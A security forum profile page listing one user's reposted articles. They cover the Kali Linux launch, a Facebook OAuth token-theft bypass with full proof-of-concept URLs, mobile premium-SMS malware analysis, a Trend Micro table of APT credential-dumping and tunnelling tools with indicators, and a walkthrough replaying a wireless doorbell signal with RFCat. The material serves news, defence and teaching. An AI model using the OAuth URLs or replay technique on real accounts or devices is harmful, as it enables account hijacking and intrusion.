Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18725

  • Joined

  • Last visited

  • Days Won

    706

 Content Type 

Everything posted by Nytro

  1. Nytro
    Da, RSSOwl am si eu si e bine pus la punct. PS: Pentru unele feed-uri mereu gaseste unele vechi ca fiind noi. Dar e ok in rest.
  2. Nytro

    New Virus POC

    Nytro replied to HellScream's topic in Off-topic

    1. Doar BitDefender? 2. Proactive Defence (sau cum se cheama la Bit) era pornita? 3. Are driver? Ruleaza kernel-mode?
  3. Nytro
    [h=1]BackTrack successor Kali Linux launched[/h]By Darren Pauli on Mar 13, 2013 10:04 PM A computer small enough to fit inside the palm of a hand sits in the corner of an office, its lights blinking. It looks like a toy to most, but the small ARM-based machine is running the latest version of Backtrack, and is breaking into the corporate network. Such a feat was not possible prior to this evening's release of Kali, the sixth installment of the uber-powerful and super-secure penetration testing platform. BackTrack obtained support for ARM-based devices as part of its quiet year-long and ground-up overhaul by the small group of security professionals who designed the operating system, now considered essential kit for penetration tests. The authors hailing from Offensive Security together with security professionals at Rapid7, who offered free assistance in the rebuild, announced Kali at BlackHat Europe. Outwardly, Kali looks the same as the previous version of BackTrack. But dig a little deeper, according to founder Mati Aharoni, and that's where the similarities end. "It boots like BackTrack, but when you look deeper into Kali, you see all these amazing new features that just weren't available in BackTrack," Aharoni told SC speaking ahead of the launch in Amsterdam. "Everything has changed." Kali has become sleeker and more secure: All packages were subject to a vetting process and were signed by developers with GPG keys. This Aharoni said introduced complete visibility into the development chain. "There is a very clear public development of each package so you can see changes easily. Visibility increased ten-fold." The Metasploit Framework too has been rebuilt. Rapid7, keen to remove the rough-around-the-edges integration of the popular exploit arsenal within BackTrack, contacted Offensive Security. In a streak of luck, the call came in early in Kali's development. From there, Metasploit underwent a considerable overhaul to become one of the most complex packages in Kali. "Users will be in for a much smoother ride," Aharoni said. "It was never built to be packaged as a distribution so we needed to massage it" This took the form of a Debian repo rather than an at times messy binary installer, Rapid7 product manager Christian Kirsch said. "A tonne of our users were using Metasploit on BackTrack," Kirsch said. "Now if you update Kali, you update Metasploit." "It is critical to take the view of the attacker to see if your defences are working. The smartest people in the world may make mistakes in setting up defences." It is also features a more friendly user interface and was available in the paid professional edition. A razor has been applied to BackTrack's pre-packaged pen testing tools, eradicating 50 unpopular tools and introducing more powerful offerings into Kali. iKat, a hacking tool to audit the security of browser controlled enviroments like Kiosks, Citrix Terminals and WebTVs, was one such addition. The developers went to lengths to get the tool on board and had even helped the author further develop and integrate it into Kali. Kali comes as fully customisable. Users were able to pick and choose the tools they want in the platform, including private applications, prior to downloading the ISO, even down to their choice of wallpaper. This Aharoni said makes Kali open to low-end systems and ARM based devices. Pre-built packages exist for a host of ARM devices including Raspberry Pi and ODROID. Kali is now available for download and the wiki page is also online. Sursa: BackTrack successor Kali Linux launched - Applications - SC Magazine Australia - Secure Business Intelligence
  4. Nytro
    [h=3]Facebook hacking accounts using another OAuth vulnerability[/h]Posted by: Mohit Kumar onTuesday, March 12, 2013 Remember the last OAuth Flaw in Facebook, that allow an attacker to hijack any account without victim's interaction with any Facebook Application, was reported by white hat Hacker 'Nir Goldshlager'. After that Facebook security team fixed that issue using some minor changes. Yesterday Goldshlager once again pwn Facebook OAuth mechanism by bypassing all those minor changes done by Facebook Team. He explains the complete Saga of hunting Facebook bug in a blog post. As explained in last report on The hacker News, OAuth URL contains two parameters i.e. redirect_uri &next, and using Regex Protection (%23xxx!,%23/xxx,/) Facebook team tried to secure that after last patch. In recent discovered technique hacker found that next parameter allow facebook.facebook.com domain as a valid option and multiple hash signs is now enough to bypass Regex Protection. He use facebook.com/l.php file (used by Facebook to redirect users to external links) to redirect victims to his malicious Facebook application and then to his own server for storing token values, where tokens are the alternate access to any Facebook account without password. But a warning message while redirecting ruin the show ! No worries, he found that 5 bytes of data in redirection URL is able to bypass this warning message. Example: https://www.facebook.com/l/goldy;touch.facebook.com/apps/sdfsdsdsgs (where 'goldy' is the 5 byte of data used). Now at the last step, He Redirect the victim to external websites located in files.nirgoldshlager.com (attacker server) via malicious Facebook app created by him and victim's access_token will be logged there. So here we have the final POC that can hack any Facebook account by exploiting another Facebook OAuth bug. For all browsers: https://www.facebook.com/connect/uiserver.php?app_id=220764691281998&next=https://facebook.facebook.com/%23/x/%23/l/ggggg%3btouch.facebook.com/apps/sdfsdsdsgs%23&display=page&fbconnect=1&method=permissions.request&response_type=token For Firefox browser: https://www.facebook.com/dialog/permissions.request?app_id=220764691281998&display=page&next=https%3A%2F%2Ftouch.facebook.com%2F%2523%2521%2Fapps%2Ftestestestte%2F&response_type=token&perms=email&fbconnect=1 This bug was also reported to Facebook Security Team last week by Nir Goldshlager and patched now, if you are a hacker, we expect YOU to hack it again ! Sursa: Facebook hacking accounts using another OAuth vulnerability - Hacking News
  5. Nytro
    Ba da, dar nu am pus link-ul acela. Poate sunt persoane care vor sa incerce.
  6. Nytro
    [h=3]Assessing risk for the March 2013 security updates[/h]swiat 12 Mar 2013 10:07 AM Today we released seven security bulletins addressing 20 CVE’s. Four of the bulletins have a maximum severity rating of Critical, and three have a maximum severity rating of Important. We hope that the table below helps you prioritize the deployment of the updates appropriately for your environment. [TABLE] [TR] [TD]Bulletin[/TD] [TD]Most likely attack vector[/TD] [TD]Max Bulletin Severity[/TD] [TD]Max Exploit-ability Index[/TD] [TD]Likely first 30 days impact[/TD] [TD]Platform mitigations and key notes[/TD] [/TR] [TR] [TD]MS13-021 (Internet Explorer) [/TD] [TD]Victim browses to a malicious webpage.[/TD] [TD]Critical[/TD] [TD]1[/TD] [TD]Exploit code for CVE-2013-1288, an issue affecting IE8, is publicly available. Likely to see reliable exploits developed within next 30 days for other vulnerabilities addressed by this update as well.[/TD] [TD]IE 10 on Windows 7 is not affected.[/TD] [/TR] [TR] [TD]MS13-022 (Silverlight) [/TD] [TD]Victim browses to a malicious webpage.[/TD] [TD]Critical[/TD] [TD]1[/TD] [TD]Likely to see reliable exploits developed within next 30 days.[/TD] [TD]Affects Silverlight 5.[/TD] [/TR] [TR] [TD]MS13-027 (Windows USB driver) [/TD] [TD]Attacker physically inserts malicious USB device into victim’s workstation or server, resulting in code execution at SYSTEM.[/TD] [TD]Important[/TD] [TD]1[/TD] [TD]Likely to see reliable exploits developed within next 30 days.[/TD] [TD]Pre-auth code execution only possible for attacker able to physically insert malicious hardware device into victim computer. See this blog post for more background on this vulnerability.[/TD] [/TR] [TR] [TD]MS13-024 (SharePoint 2010) [/TD] [TD]Attacker issues a search query on the SharePoint site with malicious script in the query string. In certain circumstances, a SharePoint admin may view search queries in such a way that the script from the attacker’s search query is run in the context of the SharePoint administrator’s session.[/TD] [TD]Critical[/TD] [TD]1[/TD] [TD]Likely to see reliable exploits developed within next 30 days.[/TD] [TD]Affects only SharePoint Server 2010 Service Pack 1, no earlier or later versions of SharePoint.[/TD] [/TR] [TR] [TD]MS13-023 (Visio Viewer 2010) [/TD] [TD]Victim uses Visio Viewer 2010 to opens malicious Visio .DXF file.[/TD] [TD]Critical[/TD] [TD]2[/TD] [TD]Less likely to see reliable exploit developed for this vulnerability. Visio Viewer exploits not often seen in the wild and this one looks more difficult than usual to exploit for reliable code execution.[/TD] [TD]Visio itself not affected by this vulnerability directly. Only Visio Viewer 2010 affected.[/TD] [/TR] [TR] [TD]MS13-025 (OneNote 2010) [/TD] [TD]Attacker lures victim to open OneNote file from a malicious or attacker-controlled directory. Attacker uses this vulnerability to cause process memory from the victim’s OneNote process to be written back to the file in the attacker’s directory, potentially leaking information to the attacker.[/TD] [TD]Important[/TD] [TD]n/a[/TD] [TD]Not possible to leverage this vulnerability for code execution directly. Information disclosure only.[/TD] [TD]Affects only OneNote 2010 Service Pack 1, no earlier or later versions of OneNote. Attacker must lure victim to opening file from a server or location they control. Only information in the OneNote process at the time of user opening the malicious file could become accessible to the attacker.[/TD] [/TR] [TR] [TD]MS13-026 (Office Outlook for Mac) [/TD] [TD]Attacker sends victim an email with links to external content. Content is loaded without prompting user.[/TD] [TD]Important[/TD] [TD]n/a[/TD] [TD]Not possible to leverage this vulnerability for code execution directly. Information disclosure only.[/TD] [TD] [/TD] [/TR] [/TABLE] - Jonathan Ness, MSRC Engineering Sursa: Assessing risk for the March 2013 security updates - Security Research & Defense - Site Home - TechNet Blogs
  7. Nytro
    Can You Crack a Code? Cica e problema data la cursul meu de cryptografie de la facultate. 12/24/09 We've challenged you before—in November 2007, December 2008, and May 2009—to unravel a code and reveal its secret message like the “cryptanalysts” in our FBI Laboratory. In our latest quiz, we've switched gears a bit, using pictogram symbols based on Native American motifs. And with more than 50 words to decipher, it's our longest one so far. For the first time, we're also posting the answer (see the bottom of this page) in case you are stumped. We ask, however, that you not post the solution on the web so that everyone can have a chance to give it a try. Once again: If you want a primer on basic cipher systems and how to break them, see the article "." Good luck! Note: Sorry, but cracking this code doesn't guarantee you a job with the FBI! But do check out careers with us at FBIJobs.gov. Sursa: FBI — Cryptanalysis Challenge 2009
  8. Nytro
    Bun, VIP.
  9. Nytro
    [h=2]Mobile Drive-By Malware example[/h]Jan Širmer March 11th, 2013 Several days ago we received a complaint about javascrpt.ru. After a bit of research, we found that it tries to mimic ajax.google.com and jquery, but the code is an obfuscated/packed redirector. After removing two layers of obfuscation, we found a list of conditions checking visitors’ user Agent. From these conditions. we got a clue and focused on mobile devices. It all starts when a user start browsing internet from their mobile devices. They visit a legitimate site that’s been hacked. This site contains a link to the site javascrpt.ru, where visitors’ browser data is sent. If script hosted at javascrpt.ru recognizes the visitor’s user Agent string as one of the list of conditions, the visitor is redirected to the malicious site, usually hosted at legitimate hosting, distributing malicious files for mobile devices. When users reach this site, the drive-by download starts. We found different behaviors for different devices. For non Android mobiles, a file called load.php ( 2DECBD7C9D058A0BFC27AD446F8B474D99977A857B1403294C0D10078C2DB51D ) is downloaded, though in a fact it is a regular Java file. But as you can see our users are well protected: But the question is what is really happening with an unprotected user? After running this file, the user expects a running application that they started, but in this case a list of agreements appears. And the first line is ‘To gain access to content, you must agree to the terms presented below’. And what are those terms? 1. To gain access to the Service wa**y.ru/ content to make payment by sending up to 3 SMS messages 2. For complete information on pricing, it can be found at the web site: www.mo****1.ru/ (This site doesn’t work right now ) Both Android and other devices are sending SMS to the Russian premium numbers NUMBER = “7255?; NUMBER = “7151?; NUMBER = “9151?; NUMBER = “2855?; After sending SMS, just a simple ICQ application is downloaded from same site: *REMOVED*/land_paysites/files/icq.jar To show better what happens when this site is reached from an Android device, you can check the next screenshots. At first, a file called, e.g., browser.apk (94FDC9CFD801E79A45209BFDC30711CB393E39E6BF2DD43CE805318E80123C14) is downloaded to the device — without the person’s knowledge. You can see in the install window that this application wants access to suspicious services that cost you money. Even in application permissions you can find suspicious permissions for your messages and directly call phone numbers that can cost you money, too. But fortunately avast! stops this application before it can cost you a huge amount of money. If a user install this application, its behavior is very similar to non-Android devices. Device sends pay text messages to those numbers and then downloads and installs a basic Dolphin browser from h***t.ru/land_browsers/files/dolphin.apk Users should be really careful if they found in theirs mobile device some unknown application. Fortunately everybody can read where application will get access to but unfortunately a lot of users don’t really pay attention to required permissions and it can cost them a lot of money but using good antivirus can help them to be protected. Sursa: http://blog.avast.com/2013/03/11/mobile-drive-by-malware-example/
  10. Nytro
    [h=1]Nanomite - Graphical Debugger for x64 and x86 on Windows[/h] [h=2]Changelog[/h] [h=3]Version 0.1 beta 7[/h] fixed some small handling bugs fixed a bug in disassembler which did not replace old protection on memory after disassembling fixed a bug which did not show terminated processes in DetailView fixed a bug which did not show terminated threads in DetailView fixed a bug which did not clean up memory on manual debugge stop improved DB handler added resolve of jump conditions to improve StepOver added "Return" and "Backspace" Hotkey to navigate in Disassembler added "Clear Log" context menu in LogBox added "Show Source" context menu in Disassembler added "Goto Function" context menu in Callstack added a crash handler added Source Viewer added memory pool for performance improvment and memory leak reduction added mouse scrolling in disassembler and stack added direkt run of target after using menu to select a file Cod sursa: https://github.com/zer0fl4g/Nanomite
  11. Nytro
    In-Depth Look: APT Attack Tools of the Trade 4:41 pm (UTC-7) | by Kyle Wilhoit (Threat Researcher) Recently, we shed some light on APT attack tools and how to identify them. Part of our daily tasks as threat researchers revolves around investigating APT actors, and the tools that they utilize to help better protect our customers. The purpose of this blog is to further investigate the tools that APT actors typically use and what they do with them. How these tools are used While many would think these tools are used during the initial compromise phase of an attack- that is not the case with this post. I will be focusing on the tools that are used after the initial compromise is attained. The following diagram illustrates where these tools are commonly used in a traditional APT lifecycle. Figure 1. Traditional APT lifecycle Step 1: The attacker sends malware to the victim. This can be done in many ways – an email message with a malicious attachment, a USB flash disk, or a compromised web site are all possibilities. Step 2: The malware is executed on the affected system. This may require manual steps by the victim, or it could be done without any intervention using exploits. Step 3: When the malware is run, it drops a backdoor such as STARSYPOUND or BOUNCER. These first stage tools push a backdoor to the attacker for later access. (These could be considered first stage tools). It allows the attacker to maintain persistence and get access to the system at a later time. Step 4: The attacker then uploads tools to perform data exfiltration, lateral movement, and a litany of other tasks. Tools overview The tools listed below include some of the tools APT actors use on a daily basis. These tools are typically employed once the APT actor gets access to the victim’s machine via one of the first stage tools listed above. Keep in mind however, that these tools are not inclusive of first stage tools such as backdoors, Trojans, and other categorical tools. In addition, this is not a complete listing of tools since that is impossible to create based on the ever-changing threat landscape. Many APT actors use custom coded applications that perform similar functionality, and thus may differ from those listed below. Use this list as a baseline of functionality to help identify similar tools in your environment and to demonstrate known tools that are used in common APT campaigns. Word of caution Identifying these tools does not necessarily imply that you have been compromised or fallen victim to an APT attack. The IOC’s contain both MD5s of the compiled apps/scripts, and/or unique strings within the code prior to being compiled. Minor modifications to these files can change the MD5 hash, so this is a limited method for identification of these applications/scripts. Also note that the phase of usage is generic for when Trend Micro typically sees these tools used. These tools are sometimes used in other stages of APT attacks. Some of them also have valid use cases where there are business needs for using the application. (Some examples include Netbox, dbgview, sdelete, etc.) [TABLE=align: center] [TR] [TD=align: center]Tool Name[/TD] [TD=align: center]Description[/TD] [TD=align: center]Typical Phase of Usage[/TD] [TD=align: center]Indicators of Compromise (IOC)[/TD] [/TR] [TR] [TD=align: center]GETMAIL[/TD] [TD=align: center]Typically used to ascertain mail archives and mail out of those archives.[/TD] [TD=align: center]Exfiltration[/TD] [TD=align: center]Unique String: Lu’s Crazy Profile (democode) Saved File Name: >=3 digit number-attach.doc[/TD] [/TR] [TR] [TD=align: center]Netbox[/TD] [TD=align: center]For hosting tools/drop servers/ C2 servers. Commonly used as infrastructure on the backend to support operational tasks. (Netbox also has valid uses, and is not a direct indicator of compromise)[/TD] [TD=align: center]Attack, Exfiltration, Persistence[/TD] [TD=align: center]N/A[/TD] [/TR] [TR] [TD=align: center]Pwdump[/TD] [TD=align: center]Dumps password hashes from the Windows registry. Typically used to crack passwords for lateral movement throughout the victim environment. It can also be used in pass-the-hash attacks.[/TD] [TD=align: center]Lateral Movement[/TD] [TD=align: center]MD5: 0xDD2EF0D6487385839BBF7863FE450CC5[/TD] [/TR] [TR] [TD=align: center]Cachedump[/TD] [TD=align: center]A program for extracting cached password hashes from a system’s registry. Typically used to crack passwords for lateral movement throughout the victim environment. It can also be used in pass-the-hash attacks.[/TD] [TD=align: center]Lateral Movement[/TD] [TD=align: center]MD5: 5065266fbad9362d5a329c5388627ea5[/TD] [/TR] [TR] [TD=align: center]Lslsass[/TD] [TD=align: center]Dumps active login session password hashes from windows processes. It is used to crack passwords for lateral movement throughout the victim environment. It can also be used in pass-the-hash attacks.[/TD] [TD=align: center]Persistence, Lateral Movement[/TD] [TD=align: center]MD5:ede305561db6f7ca1783e0fc75d0db14[/TD] [/TR] [TR] [TD=align: center]mapiget[/TD] [TD=align: center]This is for collecting emails directly from Outlook, prior to ever getting archived. It is then dumped to text files.[/TD] [TD=align: center]Persistence, Lateral Movement[/TD] [TD=align: center]Unique String: WNetCancelConnection2W Saved File Name: 5-mail.txt, mail.txt[/TD] [/TR] [TR] [TD=align: center]HTRAN[/TD] [TD=align: center]Connection bouncer, redirects TCP traffic destinted for one host to an alternate host. It is also used to help obfuscate source IP of an attacker. It allows the attacker to bounce through several connections in the victim country, confusing incident responders.[/TD] [TD=align: center]Attack, Exfiltration, Persistence[/TD] [TD=align: center]MD5:e0c14f98c4d4b995f00d49616bf9ba57, 2edfe2b5238c8f49130f2a2f85e33c18, 1725e68e574e4b077f7d16f7fa30d984, 7e3bb01afb4c50da526d142fdf444688, 3548ea689e06a2599bdd1bdb909abb75,[/TD] [/TR] [TR] [TD=align: center]Windows Credential Editor (WCE)[/TD] [TD=align: center]A security tool that allows to list logon sessions and add, change, list and delete associated credentials[/TD] [TD=align: center]Persistence, Lateral Movement[/TD] [TD=align: center]MD5:bd73c74819d8db09c645c738bbd3f5b9, df840ac27051d26555a109cc47d03fe4[/TD] [/TR] [TR] [TD=align: center]Lz77.exe[/TD] [TD=align: center]It is used as a compression application to help exfiltrate data. This is commonly seen in Winrar, 7zip, and Winzip.[/TD] [TD=align: center]Exfiltration[/TD] [TD=align: center]MD5: 2238453fd8225baff0d52bf64361b4fd[/TD] [/TR] [TR] [TD=align: center]Gsecdump[/TD] [TD=align: center]Grabs SAM file, cached credentials, and LSA secrets. Used for lateral movement in victim environment and pass-the-hash style attacks.[/TD] [TD=align: center]Lateral Movement[/TD] [TD=align: center]MD5: 57F222D8FBE0E290B4BF8EAA994AC641, 875f3fc948c6534804a26176dcfb6af0, 8ee24ad5b849877907304de566fb6dc6[/TD] [/TR] [TR] [TD=align: center]ZXProxy (A.K.A AProxy)[/TD] [TD=align: center]Proxy functionality for traffic redirection. This helps redirect HTTP/HTTPS connections for source obfuscation. We have seen it used in data exfiltration.[/TD] [TD=align: center]Exfiltration, Persistence[/TD] [TD=align: center]MD5: 0xEB36A5EF6A807FB7B2E2912E08B4882D, 0x69F5A988B4F3A3E5D300D489C9707CD6, 286760651edfe6a8b34988004156b894[/TD] [/TR] [TR] [TD=align: center]LSB-Steganography[/TD] [TD=align: center]Uses steganography techniques to embed files into images. This helps with data exfiltration as well as during the initial compromise of a traditional APT attack.[/TD] [TD=align: center]Initial Compromise, Exfiltration[/TD] [TD=align: center]MD5: c188ef350f1ee0e5fa6f6ef2e70231bc[/TD] [/TR] [TR] [TD=align: center]UPX Shell[/TD] [TD=align: center]Used to help pack code for malware used in APT campaigns. This tool helps prevent reverse engineering and code analysis.[/TD] [TD=align: center]Attack, Persistence[/TD] [TD=align: center]MD5: 1281478d409de246777472db99f58751[/TD] [/TR] [TR] [TD=align: center]ZXPortMap[/TD] [TD=align: center]Traffic redirection tool, which helps to obfuscate the source of connections.[/TD] [TD=align: center]Persistence, Exfiltration[/TD] [TD=align: center]MD5: 9a7b9caae7b8b3a2b5d68e6880b6d0a4, 2fdbb3ee0edc5e589ea727bbc2cd6d50[/TD] [/TR] [TR] [TD=align: center]ZXHttpServer[/TD] [TD=align: center]Small HTTP server that is deployable and extremely flexible. We have seen it used when attempting transfer of some files.[/TD] [TD=align: center]Exfiltration[/TD] [TD=align: center]Unique String: ZXHttpServer, ZXHttpServer.exe[/TD] [/TR] [TR] [TD=align: center]Sdelete[/TD] [TD=align: center]Secure deletion tool. Allows for secure deletion to make forensic recovery difficult- therefore complicating incident response procedures.[/TD] [TD=align: center]Persistence, Cover[/TD] [TD=align: center]MD5: e189b5ce11618bb7880e9b09d53a588f[/TD] [/TR] [TR] [TD=align: center]Dbgview[/TD] [TD=align: center]An application that lets you monitor debug output on your local system, or any computer on the network that you can reach via TCP/IP[/TD] [TD=align: center]Persistence, Lateral Movement[/TD] [TD=align: center]MD5: cea66497fa93db4b0dd33438a2a5d6bd[/TD] [/TR] [/TABLE] Many of these tools are copied to victim machines, and are often never removed by the APT actors for whatever reason. If you happen to see tools that are similar in function to the tools listed above, I think it warrants a closer look at the tools, and how they are being used in your environment. What Can Be Done There are many things that can be done to help prevent the installation of these applications onto your organizational machines such as the following: Utilize application white listing where necessary to prevent these items from being installed/used on your systems. Include SIEM resources in your organizational budget for robust logging. This will help forensically should it be needed. Remove local administrator rights for users. This will help prevent new applications are installed in the traditional fashion. While some of these applications don’t require install to work, not having administrator rights will limit what these applications can do. Many of the tools listed above will be blocked by Trend Micro products, which classify them as malicious. Here are some additional recommendations on what to do when you see these applications being used in malicious means: Look at firewall, system, security, proxy, and other logs that your system is logging to identify usage patterns of the tools. Look for communication on erroneous ports as well as traffic to IP space that is not typical to the user. Utilize IOCs (indicators of compromise) to locate similar filenames or MD5/SHA hashes for applications similar to above. Focus on path of utilization as well as filename oddities. (Such as an app named xzz.exe, which would raise a red flag) Utilize WMIC to create a script that can search throughout your entire organizational Active Directory trees and look for unique identifiers of these tools. Create a list of bad applications unique to your organization. Utilize these lists and native toolsets to each operating system to locate questionable tools. Tools for Windows like PsExec work well for this. On Linux systems, dpkg-query or qpkg work well for this. Sursa: In-Depth Look: APT Tools of the Trade | TrendLabs Security Intelligence Blog
  12. Nytro
    [h=3]You can ring my bell! Adventures in sub-GHz RF land...[/h]Dammit! Now that song is stuck in my head and will be going around and around for the next three days... Thanks, ! (and apologies if it's now stuck in yours too! But she's right: you can ring my bell. And I can ring yours. And hers. What the hell - let's just all ring each-other's bells shall we? And dim your lights. And open your garage door. And let's do it from the comfort and safety of my car, whilst driving around... Speaking of hell, what the hell am I talking about??? A little while ago I got involved in a project that needed some hardware security testing. It was a complex system that used just about every protocol under the sun, including RF. Now RF, like other 'invisible' transport mechanisms, always gets me interested because, in my experience, once data becomes invisible, something magical happens: they forget about security. Nobody can see what's going on, so we don't need to worry about it, right? Wrong. Time and time again I've seen this... MagStripes, InfraRed, RFID, Bluetooth, Magic Moon Beams. You name it, they'll send data over it insecurely. In this case the RF was mostly standard stuff like WiFi and Zigbee, but there was also something going on in the 400MHz band, so how to take a look at what was there? The obvious answer is to use an SDR (Software Defined Radio), and from previous projects I have a USRP which fits the bill. However, as I travel a lot, I prefer something a little more portable, so I'm always on the lookout for smaller alternatives. As it happens, a friend gave me a nice Christmas gift (thanks CJ!) of a FunCube dongle: This very cool device can receive on any frequency from 64MHz to 1.7GHz and fits in my laptop bag so is absolutely ideal. It also presents itself to the PC as a pseudo sound card, so is very easy to interface to. This was a fantastic bonus for me as I'm already comfortable with the idea of converting audio into data and have used the soundcard in my laptop for that purpose on many previous projects (e.g. magstripes). Radio is, almost by definition, very mysterious. You can't see it and you can't hear it, so using a soundcard is actually a very good shortcut to helping understand this completely unknown source of data. It's not intuitively obvious that it should be that way, but the human brain is very good at recognising patterns, and the soundcard not only provides us with auditory data that our ears will immediately be able to latch onto, but also visual data in the form of an editable wave file. The bottom line is that I don't understand how radio works, and I don't particularly want to - all I want is to be able to capture whatever's being sent over it and convert into something I can deal with - i.e. bits and bytes. So how to do that? The first task is to determine exactly what frequency our signal is on. There are several ways of doing this, and the simplest is to make a rough guess and just take a listen. If you're anywhere close you'll hear something when you activate the device, and you can then tune up or down until you've found the centre frequency and you're getting nice crisp clean signals. This is particularly important when trying to convert mysterious airy-fairy analogue signals back into nice reliable 0s and 1s, as any deviation can end up corrupting your data beyond all recognition. Another way is to use a spectrum analyser. This is essentially another type of RF receiver, that listens on a very wide band and shows you any spikes or other discrepancies, one of which will be the signal you're looking for. This can be in the form of software using the FunCube itself, such as HDSDR (Windows) or QUISK (Linux), or a standalone hardware device like the RF Explorer. I actually use both. The RF Explorer to quickly find the signal, and then QUISK or HDSDR to fine tune. So getting back to our examination, I can't talk about the actual device in question, but since I have a wireless doorbell, let's take a look at that instead... Like most such devices, it helpfully tells you what frequency it's using on its R&TTE approval label. In this case, 433.92 MHz. Putting that into HDSDR and hitting the button produces a nice 'hot' line right on the centre (the white and orange blob in the top window), so it looks like we're in the money... We can also hear what is obviously data. OK, so now what? How do we get it from the sound card into nice friendly binary data? Although we've decided against using the USRP, it's companion software, GNU Radio, is the obvious choice. It has a great helper tool called GNU Radio Companion which makes this kind of task an absolute doddle. There is a plugin for the FunCube which is now bundled with the main GNU Radio distribution, so no extra work is required to get it up and running. Firing it up, we can build a simple setup that connects our funcube to our speakers: and again, if we run it, we get some nice 'data' sounding output... So we can hear it, and it sounds like data, but we still can't do anything useful with it. Saving it to a wavefile is just as easy: and now this is where the fun begins. We can edit that file with any audio editor. I used Audacity but pretty much anything will do. We can clearly see our data bursts, and if we zoom in: we can see some proper structure to it. This not only sounds like data but it looks like it too. What we appear to have is long pulses and short pulses, so we can imagine they may represent 0s and 1s just as they are - maybe a short pulse is a 0 and a long a 1... Now I know I said I wasn't interested in understanding radio, but there is one little thing that will help to convert our data from it's current analogue form into proper digital, and that's modulation. There are many modulation schemes out there, but the two you're most likely to encounter at this level are FM (Frequency Modulation) and AM (Amplitude Modulation). FM is normally used for things that need reasonably high fidelity, like speech or music, but AM, although it can also be used for speech and music, is perfectly suited to binary data as all it needs to be is either 'ON' or 'OFF'. This is also known as OOK, or On-Off Keying, and as we can see from our sample, this is clearly what we are dealing with here. We have a flat line when we're 'OFF', which then becomes wavy when we're 'ON'. Now we know we're dealing with AM, we can get GNU Radio to do one more job for us: demodulate the AM signal. And our signal now looks like this: Now, instead of bursts of wavy stuff, it's pretty much a straight line that goes high or low which is very clearly binary data. We have long pulses and short pulses, and the whole sample is simply this short pattern repeating. If we assume the short pulse represents a 0 and the long a 1, this decodes as: 0100000011110 Add some leading zeros to bring it up to a multiple of eight bits and we get 00001000 00011110, which is 08 1E in hex. Of course it may actually be interpreted differently - the 0 and 1 may be the other way around, and the bit order may be reversed, but for our purposes, at this stage, it really doesn't matter as long as it makes some kind of sense. Great, so now what? I know my doorbell push-button is spitting out '081E', so therefore the bell itself must be listening for '081E' and ringing when it hears it. My neighbour's bell-push won't set it off as it's presumably sending out a different number. But how to test this? Ideally, I'd like to transmit my own signal, from something other than the bell-push, and if the bell rings I know I've got it right. Unfortunately, as cool as it is, the Fun Cube is just a receiver, so we need something that can transmit as well... The easy option would be to go back to the USRP, but I've already discounted that as it won't fit in my laptop bag and I'd like to be able to do this on the move... As I mentioned, the original device we were looking at was also using WiFi and Zigbee, so we were using an Ubertooth 2.4GHz dongle to poke around with that. I knew there were chips in the same device range that did sub-GHz frequencies, so I asked Mike Ossman, the Ubertooth's designer, if he knew of any projects utilising these. I was in luck: he did. Not only had he got some research of his own, but he pointed me at RFCat, a new project (at the time) designed to do exactly this kind of thing. Perfect! Not only would I be able to receive the signals from the bell-push, but I should be able to emulate them as well.RFCat is based around a Texas Instruments SoC (System on Chip) called the CC1111. These are really very cool devices, which provide microprocessor and built-in RF transceiver all in one package. This one even has an AES capable crypto co-processor and built-in USB, so it is the ideal platform for this kind of tomfoolery... Development kits in 433, 868 and 915 MHz bands are available off the shelf, and come in two forms: either as a standalone USB dongle (868/915 only): or these nifty wristwatches: RFCat is a replacement firmware package for the USB dongle part of the kit, and allows low level access to the radio functions via a simple USB command interface. Oh, and it's in python. Joy! So one impatient wait for an overnight delivery later I'm in business and I've got my RFCat dongle up and running. It has a nice object oriented interface, so all you need to do is create an instance and start doing stuff with it (my commands are in bold)... $ rfcat -r 'RfCat, the greatest thing since Frequency Hopping!' Research Mode: enjoy the raw power of rflib currently your environment has an object called "d" for dongle. this is how you interact with the rfcat dongle: >>> d.ping() >>> d.setFreq(433000000) >>> d.setMdmModulation(MOD_ASK_OOK) >>> d.makePktFLEN(250) >>> d.RFxmit("HALLO") >>> d.RFrecv() >>> print d.reprRadioConfig() Python 2.7.2+ (default, Jul 20 2012, 22:15:08) Type "copyright", "credits" or "license" for more information. IPython 0.10.2 -- An enhanced Interactive Python. ? -> Introduction and overview of IPython's features. %quickref -> Quick reference. help -> Python's own help system. object? -> Details about 'object'. ?object also works, ?? prints more. In [1]: d.ping() PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.002653 seconds) PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.002528 seconds) PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.004721 seconds) PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.004821 seconds) PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.004573 seconds) PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.002605 seconds) PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.002430 seconds) PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.002678 seconds) PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.002519 seconds) PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.002820 seconds) Out[1]: (10, 0, 0.0331571102142334) In [2]: d.setFreq(433920000) In [3]: d.RFxmit('\x08\x1E') In [4]: At this point, not surprisingly, my doorbell didn't ring. This is because our interpretation of the data, giving us HEX 081E, is a little bit simplistic. The RFCat dongle doesn't understand that we want to represent a 0 as a short pulse and a 1 as a long, so we have to do a bit more work to get it into a format that RFCat can deal with... A traditional microprocessor controlled radio circuit would typically have a separate circuit or daughterboard for the radio portion, and the microprocessor would signal the data it wanted to send by toggling a pin HIGH/LOW. The microprocessor would be entirely responsible for making sure that the timing was correct - i.e. that it held the pin HIGH for as long as it wanted the RF to be 'ON', and LOW for the duration of the 'OFF' period. However, in these SoC devices, the radio part is all done for you and you simply need to tell it what modulation scheme you want, speed of transmission etc., feed it some data and it will do the rest. As we already know the modulation scheme (AM/OOK), that bit's easy, so now we just have to think of our original signal in terms of OOK, and what our data would need to look like to produce the same signal. Looking at the original trace, it's pretty 'readable', but If we want to really tidy it up we can turn it into a square wave and this will make visual checking of bit lengths much easier and 